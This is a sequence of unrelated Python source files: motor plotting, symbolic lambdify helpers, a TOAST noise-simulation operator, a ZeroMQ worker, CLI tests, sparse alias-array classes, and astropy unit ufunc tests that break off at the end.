    axs[0, 0].plot(n, np.array(char['T']), 'C0-', label='Torque')
    axs[0, 0].set_ylabel("Torque / Nm")
    axs[0, 0].grid()
    axs[0, 0].legend(loc='center left')
    ax1 = axs[0, 0].twinx()
    ax1.plot(n, pmech, 'C1-', label='P mech')
    ax1.set_ylabel("Power / kW")
    ax1.legend(loc='lower center')

    # top right: voltage and power factor (first sample skipped)
    axs[0, 1].plot(n[1:], np.array(char['u1'][1:]), 'C0-', label='Voltage')
    axs[0, 1].set_ylabel("Voltage / V",)
    axs[0, 1].grid()
    axs[0, 1].legend(loc='center left')
    ax2 = axs[0, 1].twinx()
    ax2.plot(n[1:], char['cosphi'][1:], 'C1-', label='Cos Phi')
    ax2.set_ylabel("Cos Phi")
    ax2.legend(loc='lower right')

    # bottom left: currents, optionally with the beta angle
    if 'id' in char:
        axs[1, 0].plot(n, np.array(char['id']), label='Id')
    if 'iq' in char:
        axs[1, 0].plot(n, np.array(char['iq']), label='Iq')
    axs[1, 0].plot(n, np.array(char['i1']), label='I1')
    axs[1, 0].set_xlabel("Speed / rpm")
    axs[1, 0].set_ylabel("Current / A")
    axs[1, 0].legend(loc='center left')
    if 'beta' in char:
        ax3 = axs[1, 0].twinx()
        ax3.plot(n, char['beta'], 'C3-', label='Beta')
        ax3.set_ylabel("Beta / °")
        ax3.legend(loc='center right')
    axs[1, 0].grid()

    # bottom right: losses in kW with efficiency on a twin y-axis
    plfe = np.array(char['plfe'])*1e-3
    plcu = np.array(char['plcu'])*1e-3
    pl = np.array(char['losses'])*1e-3
    axs[1, 1].plot(n, plcu, 'C0-', label='Cu Losses')
    axs[1, 1].plot(n, plfe, 'C1-', label='Fe Losses')
    axs[1, 1].set_ylabel("Losses / kW")
    axs[1, 1].legend(loc='center left')
    axs[1, 1].grid()
    axs[1, 1].set_xlabel("Speed / rpm")
    ax4 = axs[1, 1].twinx()
    ax4.plot(n[1:-1], char['eta'][1:-1], 'C3-', label="Eta")
    ax4.legend(loc='upper center')
    ax4.set_ylabel("Efficiency")

    fig.tight_layout()


if __name__ == "__main__":
    # script entry point: set up basic logging and run the CLI
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(message)s')
    main()

# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
from . import _wrap_numbers, Symbol, Number, Matrix


def symbols(s):
    """ mimics sympy.symbols """
    # names may be separated by commas and/or whitespace
    names = s.replace(',', ' ').split()
    syms = tuple(Symbol(name) for name in names)
    # a single name yields the symbol itself, not a 1-tuple
    return syms[0] if len(syms) == 1 else syms


def symarray(prefix, shape):
    """return an object array of shape filled with prefix_<indices> symbols"""
    import numpy as np
    arr = np.empty(shape, dtype=object)
    for idx in np.ndindex(shape):
        suffix = '_'.join(map(str, idx))
        arr[idx] = Symbol('%s_%s' % (prefix, suffix))
    return arr


def lambdify(args, exprs):
    """
    lambdify mimics sympy.lambdify

    Args:
      args: a symbol or an iterable of symbols
      exprs: an expression or an iterable of expressions

    Returns:
      a callable evaluating exprs at the given argument values; a single
      expression yields its value, several yield a list of values
    """
    # normalize scalars to 1-tuples (EAFP: scalars have no len())
    try:
        nargs = len(args)
    except TypeError:
        args = (args,)
        nargs = 1
    try:
        nexprs = len(exprs)
    except TypeError:
        exprs = (exprs,)
        nexprs = 1

    @_wrap_numbers
    def f(*inp):
        if len(inp) != nargs:
            raise TypeError("Incorrect number of arguments")
        # NOTE(review): inp is always a tuple here (collected via *inp),
        # so this normalization can never trigger; kept unchanged
        try:
            len(inp)
        except TypeError:
            inp = (inp,)
        subsd = dict(zip(args, inp))
        # substitute and evaluate; unwrap when only one expression given
        return [expr.subs(subsd).evalf() for expr in exprs][
            0 if nexprs == 1 else slice(None)]
    return f


class Lambdify(object):
    """
    Lambdify mimics symengine.Lambdify
    """

    def __init__(self, syms, exprs):
        # symbols to substitute and the expressions to evaluate
        self.syms = syms
        self.exprs = exprs

    def __call__(self, inp, out=None):
        # evaluate the expressions at the values inp (one per symbol);
        # when a writable buffer out is supplied, it is filled in place
        # and None is returned
        inp = tuple(map(Number.make, inp))
        subsd = dict(zip(self.syms, inp))

        def _eval(expr_iter):
            # substitute and numerically evaluate each expression
            return [expr.subs(subsd).evalf() for expr in expr_iter]
        exprs = self.exprs
        if out is not None:
            # fill the caller-supplied buffer (flattened either from an
            # array-like exprs or a plain iterable); returns None
            try:
                out.flat = _eval(exprs.flatten())
            except AttributeError:
                out.flat = _eval(exprs)
        elif isinstance(exprs, Matrix):
            # Matrix result: evaluate element-wise into a numpy array
            import numpy as np
            nr, nc = exprs.nrows, exprs.ncols
            out = np.empty((nr, nc))
            for ri in range(nr):
                for ci in range(nc):
                    out[ri, ci] = exprs._get_element(
                        ri*nc + ci).subs(subsd).evalf()
            return out
            # return Matrix(nr, nc, _eval(exprs._get_element(i) for
            #                             i in range(nr*nc)))
        elif hasattr(exprs, 'reshape'):
            # NumPy like container:
            container = exprs.__class__(exprs.shape, dtype=float, order='C')
            container.flat = _eval(exprs.flatten())
            return container
        else:
            return _eval(exprs)

# Add your own choices here!

# Candidate lists per decision category; situations maps a category
# name to its choices.
fruit = ["apples", "oranges", "pears", "grapes", "blueberries"]
lunch = ["pho", "timmies", "thai", "burgers", "buffet!", "indian", "montanas"]
situations = {"fruit": fruit, "lunch": lunch}

# Copyright (c) 2015-2018 by the parties listed in the AUTHORS file.
# All rights reserved.  Use of this source code is governed by
# a BSD-style license that can be found in the LICENSE file.

"""
sim_det_noise.py implements the noise simulation operator, OpSimNoise.

"""

import numpy as np

from ..op import Operator

from ..ctoast import sim_noise_sim_noise_timestream as sim_noise_timestream
from .. import timing as timing


class OpSimNoise(Operator):
    """
    Operator which generates noise timestreams.

    This passes through each observation and every process generates data
    for its assigned samples.  The dictionary for each observation should
    include a unique 'ID' used in the random number generation.  The
    observation dictionary can optionally include a 'global_offset' member
    that might be useful if you are splitting observations and want to
    enforce reproducibility of a given sample, even when using
    different-sized observations.

    Args:
        out (str): accumulate data to the cache with name <out>_<detector>.
            If the named cache objects do not exist, then they are created.
        realization (int): if simulating multiple realizations, the realization
            index.
        component (int): the component index to use for this noise simulation.
        noise (str): PSD key in the observation dictionary.
        rate (float): sample rate to use; if None, the effective rate is
            estimated from the timestamps of each chunk.
        altFFT (bool): currently unused -- the code path consuming it is
            commented out in :meth:`simulate_chunk`.

    """

    def __init__(self, out='noise', realization=0, component=0, noise='noise',
                 rate=None, altFFT=False):

        # We call the parent class constructor, which currently does nothing
        super().__init__()

        self._out = out
        self._oversample = 2
        self._realization = realization
        self._component = component
        self._noisekey = noise
        self._rate = rate
        # NOTE(review): kept for interface compatibility; not consumed by
        # the active sim_noise_timestream call below.
        self._altfft = altFFT

    def exec(self, data):
        """
        Generate noise timestreams.

        This iterates over all observations and detectors and generates
        the noise timestreams based on the noise object for the current
        observation.

        Args:
            data (toast.Data): The distributed data.

        Raises:
            KeyError: If an observation in data does not have noise
                object defined under given key.
            RuntimeError: If observations are not split into chunks.

        """
        autotimer = timing.auto_timer(type(self).__name__)
        for obs in data.obs:
            obsindx = 0
            if 'id' in obs:
                obsindx = obs['id']
            else:
                print("Warning: observation ID is not set, using zero!")

            telescope = 0
            # BUGFIX: the tested key and the read key must match.  The
            # original checked for 'telescope' but read obs['telescope_id'],
            # raising KeyError whenever 'telescope' was present without
            # 'telescope_id'.
            if 'telescope_id' in obs:
                telescope = obs['telescope_id']

            global_offset = 0
            if 'global_offset' in obs:
                global_offset = obs['global_offset']

            tod = obs['tod']
            if self._noisekey in obs:
                nse = obs[self._noisekey]
            else:
                raise KeyError('Observation does not contain noise under '
                               '"{}"'.format(self._noisekey))
            if tod.local_chunks is None:
                raise RuntimeError('noise simulation for uniform distributed '
                                   'samples not implemented')

            # eventually we'll redistribute, to allow long correlations...

            # Timestamps are only needed when the sample rate has to be
            # estimated per chunk.
            if self._rate is None:
                times = tod.local_times()
            else:
                times = None

            # Iterate over each chunk.

            chunk_first = tod.local_samples[0]
            for curchunk in range(tod.local_chunks[1]):
                chunk_first += self.simulate_chunk(
                    tod=tod, nse=nse,
                    curchunk=curchunk, chunk_first=chunk_first,
                    obsindx=obsindx, times=times,
                    telescope=telescope, global_offset=global_offset)

        return

    def simulate_chunk(self, *, tod, nse, curchunk, chunk_first,
                       obsindx, times, telescope, global_offset):
        """
        Simulate one chunk of noise for all detectors.

        Args:
            tod (toast.tod.TOD): TOD object for the observation.
            nse (toast.tod.Noise): Noise object for the observation.
            curchunk (int): The local index of the chunk to simulate.
            chunk_first (int): First global sample index of the chunk.
            obsindx (int): Observation index for random number stream.
            times (int): Timestamps for effective sample rate.
            telescope (int): Telescope index for random number stream.
            global_offset (int): Global offset for random number stream.

        Returns:
            chunk_samp (int): Number of simulated samples

        """
        autotimer = timing.auto_timer(type(self).__name__)
        chunk_samp = tod.total_chunks[tod.local_chunks[0] + curchunk]
        local_offset = chunk_first - tod.local_samples[0]

        if self._rate is None:
            # compute effective sample rate from the median time step
            rate = 1 / np.median(np.diff(
                times[local_offset : local_offset+chunk_samp]))
        else:
            rate = self._rate

        for key in nse.keys:
            # Check if noise matching this PSD key is needed: skip keys
            # whose weight is zero for every local detector.
            weight = 0.
            for det in tod.local_dets:
                weight += np.abs(nse.weight(det, key))
            if weight == 0:
                continue

            # Simulate the noise matching this key
            #nsedata = sim_noise_timestream(
            #    self._realization, telescope, self._component, obsindx,
            #    nse.index(key), rate, chunk_first+global_offset, chunk_samp,
            #    self._oversample, nse.freq(key), nse.psd(key),
            #    self._altfft)[0]

            nsedata = sim_noise_timestream(
                self._realization, telescope, self._component, obsindx,
                nse.index(key), rate, chunk_first+global_offset, chunk_samp,
                self._oversample, nse.freq(key), nse.psd(key))

            # Add the noise to all detectors that have nonzero weights
            for det in tod.local_dets:
                weight = nse.weight(det, key)
                if weight == 0:
                    continue
                cachename = '{}_{}'.format(self._out, det)
                if tod.cache.exists(cachename):
                    ref = tod.cache.reference(cachename)
                else:
                    # Create the accumulation buffer on first use.
                    ref = tod.cache.create(cachename, np.float64,
                                           (tod.local_samples[1], ))
                ref[local_offset : local_offset+chunk_samp] += weight*nsedata
                del ref

        return chunk_samp

#!/usr/bin/python 
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#  * Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#
#  * Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in
#    the documentation and/or other materials provided with the
#    distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

import zmq
import time


if __name__ == '__main__':
  # Python 2 script: ZeroMQ PUSH/PULL pipeline worker ("divide and
  # conquer" pattern).  Pulls task messages from a ventilator on port
  # 5555 and pushes completion notices to a sink on port 6666.
  ctx = zmq.Context()
  worker = ctx.socket(zmq.PULL)
  worker.connect('tcp://localhost:5555')

  sinker = ctx.socket(zmq.PUSH)
  sinker.connect('tcp://localhost:6666')

  print 'all workers are ready ...'
  while True:
    try:
      msg = worker.recv()

      # Each message body is a task duration in milliseconds; simulate
      # the work by sleeping that long.
      print 'begin to work on task use `%s ms`' % msg
      time.sleep(int(msg) * 0.001)
      print '\tfinished this task'

      sinker.send('finished task which used `%s ms`' % msg)
    except KeyboardInterrupt:
      # Ctrl-C: stop accepting tasks and shut down cleanly.
      break

  sinker.close()
  worker.close()

from unittest import TestCase
import pkg_resources

from mock import patch

from click import UsageError
from click.testing import CliRunner


class TestCli(TestCase):
    """Tests for the ``molo.core`` scaffold and unpack CLI commands."""

    def _scaffold_kwargs(self, mock_cookiecutter, cli_args):
        # Invoke `cli.scaffold` with the given arguments and return the
        # keyword arguments passed to the mocked cookiecutter call, after
        # asserting a non-empty secret key was generated and popping it.
        from molo.core.scripts import cli

        runner = CliRunner()
        runner.invoke(cli.scaffold, cli_args)
        [call] = mock_cookiecutter.call_args_list
        args, kwargs = call
        self.assertTrue(kwargs['extra_context'].pop('secret_key'))
        return kwargs

    @staticmethod
    def _expected_context(**overrides):
        # The default extra_context produced by scaffold, with any
        # test-specific overrides applied on top.
        package = pkg_resources.get_distribution('molo.core')
        context = {
            'app_name': 'foo',
            'directory': 'foo',
            'author': 'Praekelt Foundation',
            'author_email': 'dev@praekelt.com',
            'url': None,
            'license': 'BSD',
            'molo_version': package.version,
            'require': (),
            'include': (),
        }
        context.update(overrides)
        return context

    @patch('molo.core.cookiecutter.cookiecutter')
    def test_scaffold(self, mock_cookiecutter):
        """Plain scaffold uses the app name as the target directory."""
        kwargs = self._scaffold_kwargs(mock_cookiecutter, ['foo'])
        self.assertEqual(kwargs, {
            'no_input': True,
            'extra_context': self._expected_context(),
        })

    @patch('molo.core.cookiecutter.cookiecutter')
    def test_scaffold_with_custom_dir(self, mock_cookiecutter):
        """A second positional argument overrides the target directory."""
        kwargs = self._scaffold_kwargs(mock_cookiecutter, ['foo', 'bar'])
        self.assertEqual(kwargs, {
            'no_input': True,
            'extra_context': self._expected_context(directory='bar'),
        })

    @patch('molo.core.cookiecutter.cookiecutter')
    def test_scaffold_with_requirements(self, mock_cookiecutter):
        """--require options are collected into the 'require' tuple."""
        kwargs = self._scaffold_kwargs(
            mock_cookiecutter, ['foo', '--require', 'bar'])
        self.assertEqual(kwargs, {
            'no_input': True,
            'extra_context': self._expected_context(require=('bar',)),
        })

    @patch('molo.core.cookiecutter.cookiecutter')
    def test_scaffold_with_includes(self, mock_cookiecutter):
        """--include options are collected into the 'include' tuple."""
        kwargs = self._scaffold_kwargs(
            mock_cookiecutter, ['foo', '--include', 'bar', 'baz'])
        self.assertEqual(kwargs, {
            'no_input': True,
            'extra_context': self._expected_context(
                include=(('bar', 'baz'),)),
        })

    @patch('molo.core.scripts.cli.get_package')
    @patch('molo.core.scripts.cli.get_template_dirs')
    @patch('shutil.copytree')
    def test_unpack(self, mock_copytree, mock_get_template_dirs,
                    mock_get_package):
        """unpack_templates copies each template dir of each package."""
        mock_get_package.return_value = pkg_resources.get_distribution(
            'molo.core')
        mock_get_template_dirs.return_value = ['foo']
        mock_copytree.return_value = True

        from molo.core.scripts import cli
        CliRunner().invoke(cli.unpack_templates, ['app1', 'app2'])

        template_dir = pkg_resources.resource_filename(
            'molo.core', 'templates/foo')
        mock_copytree.assert_called_with(template_dir, template_dir)

    def test_get_package(self):
        """Unknown package names raise a UsageError."""
        from molo.core.scripts.cli import get_package
        self.assertRaisesRegexp(
            UsageError, 'molo.foo is not installed.', get_package, 'molo.foo')

import numpy as np
from scipy.sparse import csr_matrix


class AliasArray(np.ndarray):
    """An ndarray with a mapping of values to user-friendly names -- see example

    This ndarray subclass enables comparing sub_id and hop_id arrays directly with
    their friendly string identifiers. The mapping parameter translates sublattice
    or hopping names into their number IDs.

    Only the `==` and `!=` operators are overloaded to handle the aliases.

    Examples
    --------
    >>> a = AliasArray([0, 1, 0], mapping={"A": 0, "B": 1})
    >>> list(a == 0)
    [True, False, True]
    >>> list(a == "A")
    [True, False, True]
    >>> list(a != "A")
    [False, True, False]
    >>> a = AliasArray([0, 1, 0, 2], mapping={"A|1": 0, "B": 1, "A|2": 2})
    >>> list(a == "A")
    [True, False, True, True]
    >>> list(a != "A")
    [False, True, False, False]
    """
    def __new__(cls, array, mapping):
        obj = np.asarray(array).view(cls)
        # Keys become SplitName so that "A" also matches "A|1", "A|2", ...
        obj.mapping = {SplitName(k): v for k, v in mapping.items()}
        return obj

    def __array_finalize__(self, obj):
        # Called whenever a view/slice is created: carry the mapping over.
        if obj is None:
            return
        self.mapping = getattr(obj, "mapping", None)

    def _mapped_eq(self, other):
        """Compare with a string alias, resolving it through the mapping."""
        if other in self.mapping:
            # Exact key match: compare against that single ID.
            return super().__eq__(self.mapping[other])
        else:
            # `other` may be the first part of several SplitName keys
            # (e.g. "A" matching "A|1" and "A|2") -- OR the comparisons
            # for every matching key.
            # BUGFIX: `np.bool` (a deprecated alias of the builtin) was
            # removed in NumPy 1.24; use the builtin `bool` dtype.
            result = np.zeros(len(self), dtype=bool)
            for k, v in self.mapping.items():
                if k == other:
                    result = np.logical_or(result, super().__eq__(v))
            return result

    def __eq__(self, other):
        if isinstance(other, str):
            return self._mapped_eq(other)
        else:
            return super().__eq__(other)

    def __ne__(self, other):
        if isinstance(other, str):
            return np.logical_not(self._mapped_eq(other))
        else:
            return super().__ne__(other)


# noinspection PyAbstractClass
class AliasCSRMatrix(csr_matrix):
    """Same as :class:`AliasArray` but for a CSR matrix

    Examples
    --------
    >>> from scipy.sparse import spdiags
    >>> m = AliasCSRMatrix(spdiags([1, 2, 1], [0], 3, 3), mapping={'A': 1, 'B': 2})
    >>> list(m.data == 'A')
    [True, False, True]
    >>> list(m.tocoo().data == 'A')
    [True, False, True]
    >>> list(m[:2].data == 'A')
    [True, False]
    """
    def __init__(self, *args, **kwargs):
        # Accept `mapping` as a keyword; if absent, inherit it from the
        # source matrix (e.g. when wrapping an existing AliasCSRMatrix).
        mapping = kwargs.pop('mapping', {})
        if not mapping:
            mapping = getattr(args[0], 'mapping', {})

        super().__init__(*args, **kwargs)
        # Replace the raw data array with an alias-aware view so that
        # `m.data == 'name'` comparisons work.
        self.data = AliasArray(self.data, mapping)

    @property
    def format(self):
        # scipy sets `format` as a plain attribute; shadowing it with a
        # read-only property (plus a no-op setter below) keeps this
        # subclass always reporting 'csr' while letting scipy's internals
        # "assign" to it harmlessly.
        return 'csr'

    @format.setter
    def format(self, _):
        # Intentionally ignore assignment -- see the property above.
        pass

    @property
    def mapping(self):
        # The mapping lives on the alias-aware data array.
        return self.data.mapping

    def tocoo(self, *args, **kwargs):
        # COO conversion produces a plain ndarray for `.data`; re-wrap it
        # so alias comparisons keep working on the converted matrix.
        coo = super().tocoo(*args, **kwargs)
        coo.data = AliasArray(coo.data, mapping=self.mapping)
        return coo

    def __getitem__(self, item):
        # Slicing returns a plain csr_matrix; re-wrap CSR results to
        # preserve the mapping.  Non-CSR results (e.g. scalars) pass
        # through unchanged.
        result = super().__getitem__(item)
        if getattr(result, 'format', '') == 'csr':
            return AliasCSRMatrix(result, mapping=self.mapping)
        else:
            return result


class AliasIndex:
    """An all-or-nothing array index based on equality with a specific value

    Comparing with `==` or `!=` yields a lazy array whose elements are all
    `True` or all `False`, decided by a single comparison against the stored
    name.  Modifiers receive arrays where every element shares the same
    sub_id/hop_id, so this stands in for an :class:`AliasArray` of `.size`
    identical elements without materializing one.

    Examples
    --------
    >>> l = np.array([1, 2, 3])
    >>> ai = AliasIndex("A", len(l))
    >>> list(l[ai == "A"])
    [1, 2, 3]
    >>> list(l[ai == "B"])
    []
    >>> list(l[ai != "A"])
    []
    >>> list(l[ai != "B"])
    [1, 2, 3]
    >>> np.logical_and([True, False, True], ai == "A")
    array([ True, False,  True], dtype=bool)
    >>> np.logical_and([True, False, True], ai != "A")
    array([False, False, False], dtype=bool)
    >>> bool(ai == "A")
    True
    >>> bool(ai != "A")
    False
    >>> str(ai)
    'A'
    >>> hash(ai) == hash("A")
    True
    >>> int(ai.eye)
    1
    >>> np.allclose(AliasIndex("A", 1, (2, 2)).eye, np.eye(2))
    True
    """
    class LazyArray:
        """Constant boolean array, materialized only via __array__."""

        def __init__(self, value, shape):
            self.value = value
            self.shape = shape

        def __bool__(self):
            # Truthiness of the whole (constant) array.
            return bool(self.value)

        def __array__(self):
            # Materialize on demand for NumPy operations.
            return np.full(self.shape, self.value)

    def __init__(self, name, shape, orbs=(1, 1)):
        self.name = name
        self.shape = shape
        self.orbs = orbs

    def __str__(self):
        return self.name

    def __eq__(self, other):
        matches = (self.name == other)
        return self.LazyArray(matches, self.shape)

    def __ne__(self, other):
        differs = (self.name != other)
        return self.LazyArray(differs, self.shape)

    def __hash__(self):
        # Hash like the plain name so it can key dicts alongside strings.
        return hash(self.name)

    @property
    def eye(self):
        # Identity matrix sized by the orbital dimensions.
        return np.eye(*self.orbs)


class SplitName(str):
    """String subclass with special support for strings of the form "first|second"

    Equality (`==`) and inequality (`!=`) also consider a match against
    only the part before the first ``|`` separator.

    Examples
    --------
    >>> s = SplitName("first|second")
    >>> s == "first|second"
    True
    >>> s != "first|second"
    False
    >>> s == "first"
    True
    >>> s != "first"
    False
    >>> s == "second"
    False
    >>> s != "second"
    True
    """
    @property
    def first(self):
        # Everything before the first "|" (the whole string if absent).
        return self.partition("|")[0]

    def __eq__(self, other):
        full_match = super().__eq__(other)
        return full_match or self.first == other

    def __ne__(self, other):
        full_differs = super().__ne__(other)
        return full_differs and self.first != other

    def __hash__(self):
        # Hash as the full string, so "A" and "A|1" remain distinct keys.
        return super().__hash__()

# The purpose of these tests are to ensure that calling ufuncs with quantities
# returns quantities with the right units, or raises exceptions.

import warnings

import pytest
import numpy as np
from numpy.testing.utils import assert_allclose

from ... import units as u
from ...tests.helper import raises
from ...extern.six.moves import zip
from ...utils.compat import NUMPY_LT_1_13


class TestUfuncCoverage(object):
    """Test that we cover all ufunc's"""

    def test_coverage(self):
        # Every ufunc NumPy exposes must be either supported (has a
        # helper) or explicitly listed as unsupported -- and vice versa.
        all_np_ufuncs = {obj for obj in np.core.umath.__dict__.values()
                         if type(obj) is np.ufunc}

        from .. import quantity_helper as qh

        all_q_ufuncs = qh.UNSUPPORTED_UFUNCS | set(qh.UFUNC_HELPERS)

        assert all_np_ufuncs - all_q_ufuncs == set()
        assert all_q_ufuncs - all_np_ufuncs == set()


class TestQuantityTrigonometricFuncs(object):
    """
    Test trigonometric functions

    Each ufunc is checked for correct values on scalar and array
    quantities, for unit handling (results are dimensionless; inverse
    functions round-trip back to the input unit), and for a TypeError
    with an explanatory message on incompatible units.
    """

    def test_sin_scalar(self):
        q = np.sin(30. * u.degree)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value, 0.5)

    def test_sin_array(self):
        q = np.sin(np.array([0., np.pi / 4., np.pi / 2.]) * u.radian)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value,
                        np.array([0., 1. / np.sqrt(2.), 1.]), atol=1.e-15)

    def test_arcsin_scalar(self):
        q1 = 30. * u.degree
        q2 = np.arcsin(np.sin(q1)).to(q1.unit)
        assert_allclose(q1.value, q2.value)

    def test_arcsin_array(self):
        q1 = np.array([0., np.pi / 4., np.pi / 2.]) * u.radian
        q2 = np.arcsin(np.sin(q1)).to(q1.unit)
        assert_allclose(q1.value, q2.value)

    def test_sin_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.sin(3. * u.m)
        assert exc.value.args[0] == ("Can only apply 'sin' function "
                                     "to quantities with angle units")

    def test_arcsin_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.arcsin(3. * u.m)
        assert exc.value.args[0] == ("Can only apply 'arcsin' function to "
                                     "dimensionless quantities")

    def test_arcsin_no_warning_on_unscaled_quantity(self):
        # Regression test: arcsin of a dimensionless ratio (kpc/pc) must
        # not emit any warning during the implicit unit conversion.
        a = 15 * u.kpc
        b = 27 * u.pc

        with warnings.catch_warnings():
            warnings.filterwarnings('error')
            np.arcsin(b/a)

    def test_cos_scalar(self):
        q = np.cos(np.pi / 3. * u.radian)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value, 0.5)

    def test_cos_array(self):
        q = np.cos(np.array([0., np.pi / 4., np.pi / 2.]) * u.radian)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value,
                        np.array([1., 1. / np.sqrt(2.), 0.]), atol=1.e-15)

    def test_arccos_scalar(self):
        q1 = np.pi / 3. * u.radian
        q2 = np.arccos(np.cos(q1)).to(q1.unit)
        assert_allclose(q1.value, q2.value)

    def test_arccos_array(self):
        q1 = np.array([0., np.pi / 4., np.pi / 2.]) * u.radian
        q2 = np.arccos(np.cos(q1)).to(q1.unit)
        assert_allclose(q1.value, q2.value)

    def test_cos_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.cos(3. * u.s)
        assert exc.value.args[0] == ("Can only apply 'cos' function "
                                     "to quantities with angle units")

    def test_arccos_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.arccos(3. * u.s)
        assert exc.value.args[0] == ("Can only apply 'arccos' function to "
                                     "dimensionless quantities")

    def test_tan_scalar(self):
        q = np.tan(np.pi / 3. * u.radian)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value, np.sqrt(3.))

    def test_tan_array(self):
        q = np.tan(np.array([0., 45., 135., 180.]) * u.degree)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value,
                        np.array([0., 1., -1., 0.]), atol=1.e-15)

    def test_arctan_scalar(self):
        q = np.pi / 3. * u.radian
        assert np.arctan(np.tan(q))

    def test_arctan_array(self):
        q = np.array([10., 30., 70., 80.]) * u.degree
        assert_allclose(np.arctan(np.tan(q)).to_value(q.unit), q.value)

    def test_tan_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.tan(np.array([1, 2, 3]) * u.N)
        assert exc.value.args[0] == ("Can only apply 'tan' function "
                                     "to quantities with angle units")

    def test_arctan_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.arctan(np.array([1, 2, 3]) * u.N)
        assert exc.value.args[0] == ("Can only apply 'arctan' function to "
                                     "dimensionless quantities")

    def test_arctan2_valid(self):
        # arctan2 accepts compatible-unit pairs, converting the second
        # argument to the first's unit before the value comparison.
        q1 = np.array([10., 30., 70., 80.]) * u.m
        q2 = 2.0 * u.km
        assert np.arctan2(q1, q2).unit == u.radian
        assert_allclose(np.arctan2(q1, q2).value,
                        np.arctan2(q1.value, q2.to_value(q1.unit)))
        q3 = q1 / q2
        q4 = 1.
        at2 = np.arctan2(q3, q4)
        assert_allclose(at2.value, np.arctan2(q3.to_value(1), q4))

    def test_arctan2_invalid(self):
        with pytest.raises(u.UnitsError) as exc:
            np.arctan2(np.array([1, 2, 3]) * u.N, 1. * u.s)
        assert "compatible dimensions" in exc.value.args[0]
        with pytest.raises(u.UnitsError) as exc:
            np.arctan2(np.array([1, 2, 3]) * u.N, 1.)
        assert "dimensionless quantities when other arg" in exc.value.args[0]

    def test_radians(self):

        q1 = np.deg2rad(180. * u.degree)
        assert_allclose(q1.value, np.pi)
        assert q1.unit == u.radian

        q2 = np.radians(180. * u.degree)
        assert_allclose(q2.value, np.pi)
        assert q2.unit == u.radian

        # the following doesn't make much sense in terms of the name of the
        # routine, but we check it gives the correct result.
        q3 = np.deg2rad(3. * u.radian)
        assert_allclose(q3.value, 3.)
        assert q3.unit == u.radian

        q4 = np.radians(3. * u.radian)
        assert_allclose(q4.value, 3.)
        assert q4.unit == u.radian

        with pytest.raises(TypeError):
            np.deg2rad(3. * u.m)

        with pytest.raises(TypeError):
            np.radians(3. * u.m)

    def test_degrees(self):

        # the following doesn't make much sense in terms of the name of the
        # routine, but we check it gives the correct result.
        q1 = np.rad2deg(60. * u.degree)
        assert_allclose(q1.value, 60.)
        assert q1.unit == u.degree

        q2 = np.degrees(60. * u.degree)
        assert_allclose(q2.value, 60.)
        assert q2.unit == u.degree

        q3 = np.rad2deg(np.pi * u.radian)
        assert_allclose(q3.value, 180.)
        assert q3.unit == u.degree

        q4 = np.degrees(np.pi * u.radian)
        assert_allclose(q4.value, 180.)
        assert q4.unit == u.degree

        with pytest.raises(TypeError):
            np.rad2deg(3. * u.m)

        with pytest.raises(TypeError):
            np.degrees(3. * u.m)


class TestQuantityMathFuncs(object):
    """
    Test other mathematical functions
    """

    def test_multiply_scalar(self):
        assert np.multiply(4. * u.m, 2. / u.s) == 8. * u.m / u.s
        assert np.multiply(4. * u.m, 2.) == 8. * u.m
        assert np.multiply(4., 2. / u.s) == 8. / u.s

    def test_multiply_array(self):
        assert np.all(np.multiply(np.arange(3.) * u.m, 2. / u.s) ==
                      np.arange(0, 6., 2.) * u.m / u.s)

    @pytest.mark.parametrize('function', (np.divide, np.true_divide))
    def test_divide_scalar(self, function):
        assert function(4. * u.m, 2. * u.s) == function(4., 2.) * u.m / u.s
        assert function(4. * u.m, 2.) == function(4., 2.) * u.m
        assert function(4., 2. * u.s) == function(4., 2.) / u.s

    @pytest.mark.parametrize('function', (np.divide, np.true_divide))
    def test_divide_array(self, function):
        assert np.all(function(np.arange(3.) * u.m, 2. * u.s) ==
                      function(np.arange(3.), 2.) * u.m / u.s)

    def test_floor_divide_remainder_and_divmod(self):
        # For mixed units, the quotient is dimensionless while the
        # remainder keeps the dividend's unit.
        inch = u.Unit(0.0254 * u.m)
        dividend = np.array([1., 2., 3.]) * u.m
        divisor = np.array([3., 4., 5.]) * inch
        quotient = dividend // divisor
        remainder = dividend % divisor
        assert_allclose(quotient.value, [13., 19., 23.])
        assert quotient.unit == u.dimensionless_unscaled
